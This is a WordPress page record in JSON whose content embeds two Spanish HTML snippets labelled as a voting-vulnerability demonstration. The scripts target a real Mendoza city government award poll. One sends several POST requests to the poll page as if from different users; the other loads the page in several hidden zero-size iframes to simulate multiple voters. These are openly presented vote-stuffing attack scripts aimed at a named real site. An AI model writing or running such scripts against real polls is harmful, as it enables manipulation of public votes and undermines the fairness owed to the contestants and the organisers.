{"id":13545,"date":"2025-08-04T23:03:15","date_gmt":"2025-08-04T23:03:15","guid":{"rendered":"https:\/\/vectora.ar\/?page_id=13545"},"modified":"2025-08-04T23:06:08","modified_gmt":"2025-08-04T23:06:08","slug":"az","status":"publish","type":"page","link":"https:\/\/vectora.ar\/en\/az\/","title":{"rendered":"az"},"content":{"rendered":"<div data-elementor-type=\"wp-page\" data-elementor-id=\"13545\" class=\"elementor elementor-13545\" data-elementor-post-type=\"page\">\n\t\t\t\t<div class=\"elementor-element elementor-element-682f54a e-flex e-con-boxed e-con e-parent\" data-id=\"682f54a\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-05c7f8a elementor-widget elementor-widget-html\" data-id=\"05c7f8a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"html.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<!DOCTYPE html>\r\n<html lang=\"es\">\r\n<head>\r\n  <meta charset=\"UTF-8\">\r\n  <title>Demostraci\u00f3n de vulnerabilidad en votaci\u00f3n<\/title>\r\n<\/head>\r\n<body>\r\n  <h2>Simulaci\u00f3n de votaciones m\u00faltiples<\/h2>\r\n  <p>Al hacer clic en el bot\u00f3n se enviar\u00e1n m\u00faltiples solicitudes de voto como si fueran distintos usuarios.<\/p>\r\n  <button onclick=\"enviarVotos()\">Enviar votos<\/button>\r\n\r\n  <script>\r\n    const NUM_VOTOS = 5; \/\/ Cambiar seg\u00fan la cantidad que quieras demostrar\r\n\r\n    function enviarVotos() {\r\n      for (let i = 0; i < NUM_VOTOS; i++) {\r\n        fetch(\"https:\/\/prensa.ciudaddemendoza.gob.ar\/2025\/08\/01\/premio-mujeres-en-innovacion-ya-podes-votar-a-tu-favorita\/\", {\r\n          method: \"POST\",\r\n          mode: \"no-cors\"\r\n        }).then(() => {\r\n          console.log(\"Voto simulado #\" + (i + 1));\r\n        }).catch(err => {\r\n          console.error(\"Error al enviar voto:\", err);\r\n        });\r\n      }\r\n    }\r\n  <\/script>\r\n<\/body>\r\n<\/html>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-14ef2ef e-flex e-con-boxed e-con e-parent\" data-id=\"14ef2ef\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-0d5f7bf elementor-widget elementor-widget-html\" data-id=\"0d5f7bf\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"html.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<html lang=\"es\">\r\n<head>\r\n  <meta charset=\"UTF-8\">\r\n  <title>Demostraci\u00f3n de votos m\u00faltiples<\/title>\r\n<\/head>\r\n<body>\r\n  <h2>Simulaci\u00f3n de votos abriendo m\u00faltiples sesiones<\/h2>\r\n  <p>Al hacer clic, se abrir\u00e1n m\u00faltiples iframes con la p\u00e1gina de votaci\u00f3n para simular m\u00faltiples accesos.<\/p>\r\n  <button onclick=\"simularVotantes()\">Abrir m\u00faltiples sesiones<\/button>\r\n  <div id=\"iframes\"><\/div>\r\n\r\n  <script>\r\n    function simularVotantes() {\r\n      const cantidad = 5; \/\/ Cu\u00e1ntos votos simular\r\n      const url = \"https:\/\/prensa.ciudaddemendoza.gob.ar\/2025\/08\/01\/premio-mujeres-en-innovacion-ya-podes-votar-a-tu-favorita\/\";\r\n\r\n      for (let i = 0; i < cantidad; i++) {\r\n        const iframe = document.createElement('iframe');\r\n        iframe.src = url;\r\n        iframe.width = \"0\";\r\n        iframe.height = \"0\";\r\n        iframe.style.border = \"none\";\r\n        document.getElementById(\"iframes\").appendChild(iframe);\r\n      }\r\n    }\r\n  <\/script>\r\n<\/body>\r\n<\/html>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>","protected":false},"excerpt":{"rendered":"<p>Demostraci\u00f3n de vulnerabilidad en votaci\u00f3n Simulaci\u00f3n de votaciones m\u00faltiples Al hacer clic en el bot\u00f3n se enviar\u00e1n m\u00faltiples solicitudes de voto como si fueran distintos usuarios. Enviar votos Demostraci\u00f3n de votos m\u00faltiples Simulaci\u00f3n de votos abriendo m\u00faltiples sesiones Al hacer clic, se abrir\u00e1n m\u00faltiples iframes con la p\u00e1gina de votaci\u00f3n para simular m\u00faltiples accesos. Abrir [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"class_list":["post-13545","page","type-page","status-publish","hentry"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/vectora.ar\/en\/wp-json\/wp\/v2\/pages\/13545","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/vectora.ar\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/vectora.ar\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/vectora.ar\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/vectora.ar\/en\/wp-json\/wp\/v2\/comments?post=13545"}],"version-history":[{"count":7,"href":"https:\/\/vectora.ar\/en\/wp-json\/wp\/v2\/pages\/13545\/revisions"}],"predecessor-version":[{"id":13552,"href":"https:\/\/vectora.ar\/en\/wp-json\/wp\/v2\/pages\/13545\/revisions\/13552"}],"wp:attachment":[{"href":"https:\/\/vectora.ar\/en\/wp-json\/wp\/v2\/media?parent=13545"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}